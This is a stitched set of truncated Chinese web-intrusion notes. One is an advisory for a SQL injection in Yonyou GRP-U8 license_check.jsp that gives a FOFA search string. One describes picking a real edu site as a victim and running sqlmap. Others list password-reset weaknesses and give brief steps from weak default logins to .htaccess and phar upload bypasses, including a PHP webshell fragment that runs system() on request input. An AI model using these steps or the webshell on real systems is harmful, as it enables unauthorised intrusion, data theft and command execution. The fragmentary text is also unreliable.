##0x01 漏洞介绍 ####用友 GRP-U8 license_check.jsp 存在sql注入，攻击者可利用该漏洞执行任意SQL语句，如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 ####fofa：app=”用友-GRP-U8” ![](https://nc0.cdn.zkaq.cn/md/13214

#嗨害嗨 我来水洞啦 ## 随机找一个edu的受害者，/admin进入管理员登入界面  ## admin没有,右上提示没有列名，直接sqlmap一把梭哈，6种注入#C

密码找回功能可能存在的漏洞1.验证码发送后前端返回2.验证码无次数限制可爆破3.验证码可控/邮箱篡改为自己的接收短信验证码/手机号码篡改为自己的接收短信验证码4.越权漏洞—>自己验证码通过改包然后修改他们密码5.任意用户密码重置6.密保问题在前端源码实战开始简单信息收集，发现存在这样一个功能：经过分析发现，使用的手机号码都是同一个地区的号码。根据当地号码数字来进行构造，如:13407

1.弱口令登入后台：admin/tao2.编辑.htaccess文件，改成可jpg文件可解析成php3.上传图片马"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>4.执行cm

1.弱口令：admin/admin登入后台2.找到后台上传点3.上传文件抓包，改成phar后缀绕过上传4.访问上传文件执行cmd命令

1.打开靶场扫描目录找到一个目录遍历（好像没什么屌用）2.弱口令：adminadmin/adminadmin3.找到系统→网络配置，修改网站后台网址4.代码执行成功5.得到flag